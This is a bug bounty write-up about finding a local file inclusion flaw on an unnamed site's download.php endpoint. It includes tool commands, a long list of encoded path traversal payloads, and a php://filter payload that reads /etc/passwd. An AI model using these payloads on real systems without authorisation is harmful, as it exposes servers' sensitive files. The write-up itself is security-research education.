# Easy LFI

Hello Hackers !!

I\`m going to share one of my last & fast finding

let’s call it **target.com**, they runs a bug bounty program with wildcard scope **\*.target.com**

#### Tools:

* [Subdomainer](https://github.com/Cyber-Guy1/Subdomainer)
* [waybackurls](https://github.com/tomnomnom/waybackurls)
* [gf](https://github.com/tomnomnom/gf)

### <mark style="color:yellow;">**Subdomains Enumeration**</mark>

In this step it\`s a gold tip to use multiple tools to gather good results, I like to use [**Subdomainer**](https://github.com/Cyber-Guy1/Subdomainer)

Subdomainer is an automation tool for domains & subdomains gatherin wheather for single target or multiple targets. Subdomainer uses multiple tools for doing the subdomains & domians gathering job in a perfect way, it can take a domains / targets list and doing the whole operation on them and after finshing the job it save the result in a comprehandable & ordered way.

A simple usage for Subdomainer

**`./subdomainer -t target.com –f true`**

A lot of thing comes after subdomains gathering, one of them is collect all urls from live hosts and filter any intersting parameters or endpoints

### <mark style="color:yellow;">Collect Them All</mark>

So in this step I use [**waybackurl**s](https://github.com/tomnomnom/waybackurls)

Usage Of Waybackurl: This is really a good tool for bugbounty hunter to fetch all url from wayback machine .

**`cat all_live.txt | waybackurls`**

### <mark style="color:yellow;">Wrapper</mark>

Now we have all wayback urls now You can grep to collect you interesting parameter or end point usage:

**`grep -iE “redirect=”`**

**But that would take a lot of time and effort. To automate this process we can use** [**gf**](https://github.com/tomnomnom/gf) **tool**

A wrapper around grep to avoid typing common patterns.

**`cat waybackdata | gf lfi | tee -a lfi.txt`**

after that we can go and check these endpoint manually

Luckily, I noticed a very promising endpoint  `/download.php?file` and my spidey sense got activated

![](https://media.giphy.com/media/1qErVv5GVUac8uqBJU/giphy.gif)

After visiting this host i found that this endpoint was for downloading pdf files&#x20;

when trying to inject `1` to this parameter It downloads a file contain this error&#x20;

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FGW5euA7dlQFUD3OIDoUG%2Fcode.jpg?alt=media\&token=b0df9e2b-9e28-4fda-8dc2-8ee979ce0334)

so clearly this function job is to seacrh for a requested file via this parametr in this path and try to get&#x20;

without another thought i injected some payloads like this:

```
..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}
```

But no luck .. i got the same error message&#x20;

![](https://media.giphy.com/media/7SF5scGB2AFrgsXP63/giphy.gif)

in spite of that something was telling me to keep digging into this 🧐

By using [wappalyzer ](https://www.wappalyzer.com/)I found that this host is running on php, so I used php file wrappers payload

`php://filter/convert.base64-encode/resource=/etc/passwd`

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2F6mTB68Yba4rp5R0pjNdI%2F1.jpg?alt=media\&token=361ccf1e-4735-41c8-ad38-dacd46812fb7)

**php\://filter** allows a pen tester to include local files and base64 encodes the output. Therefore, any base64 output will need to be decoded to reveal the contents

So let\`s decode this base64 string

**`echo "BASE64_STRING" | base64 -d`**

![base64 decoded output from /etc/passwd on a UNIX / Linux system](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2Fe1jsDgw00vSSai581I5p%2F1?alt=media)

And we got our **/passwd** file decoded

![](https://media.giphy.com/media/3ohhweiVB36rAlqVCE/giphy.gif)

### <mark style="color:yellow;">EXTRA</mark>

Although these tools and techniques are few, there is a lot that can be done with it . you can use multiple [Gf-Patterns](https://github.com/1ndianl33t/Gf-Patterns) to get :

* xss
* ssrf
* idor
* ssti
* open redirect
* etc

A great Place to find more LFI bypassing tricks:

{% embed url="<https://book.hacktricks.xyz/pentesting-web/file-inclusion>" %}

> Thanks For Reading